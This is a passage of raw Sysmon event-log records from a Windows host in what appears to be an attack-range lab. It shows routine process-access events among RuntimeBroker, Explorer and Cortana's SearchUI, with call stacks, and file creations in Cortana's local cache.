13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+170f34|C:\Windows\System32\Windows.Storage.dll+1411fc|C:\Windows\System32\Windows.Storage.dll+140e39|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+104083|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000013052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+170f34|C:\Windows\System32\Windows.Storage.dll+1411fc|C:\Windows\System32\Windows.Storage.dll+140e39|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+104083|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bc4b|C:\Windows\System32\Windows.Storage.dll+12db23|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000013050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bbe8|C:\Windows\System32\Windows.Storage.dll+12db04|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000013049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12cd6b|C:\Windows\System32\Windows.Storage.dll+12c245|C:\Windows\System32\Windows.Storage.dll+12c022|C:\Windows\System32\Windows.Storage.dll+12f28a|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000013048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000013047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60e40|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+5fb52|C:\Windows\System32\Windows.Storage.dll+60148|C:\Windows\System32\Windows.Storage.dll+19f723|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000013045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+19f828|C:\Windows\System32\Windows.Storage.dll+19f709|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.820{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 11241100x800000000000000013043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.804{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75df8f4e-2230-4373-8b17-a6e5861be9ea}\0.2.filtertrie.intermediate.txt2021-01-18 13:58:36.804 11241100x800000000000000013042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.804{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75df8f4e-2230-4373-8b17-a6e5861be9ea}\0.1.filtertrie.intermediate.txt2021-01-18 13:58:36.804 11241100x800000000000000013041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.804{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{75df8f4e-2230-4373-8b17-a6e5861be9ea}\0.0.filtertrie.intermediate.txt2021-01-18 13:58:36.804 11241100x800000000000000013040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.773{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\appssynonyms.txt2016-04-15 08:09:24.000 10341000x800000000000000013039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.726{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000013038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.726{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.711{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132554519165906401.txt2021-01-18 13:58:36.711 10341000x800000000000000013036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 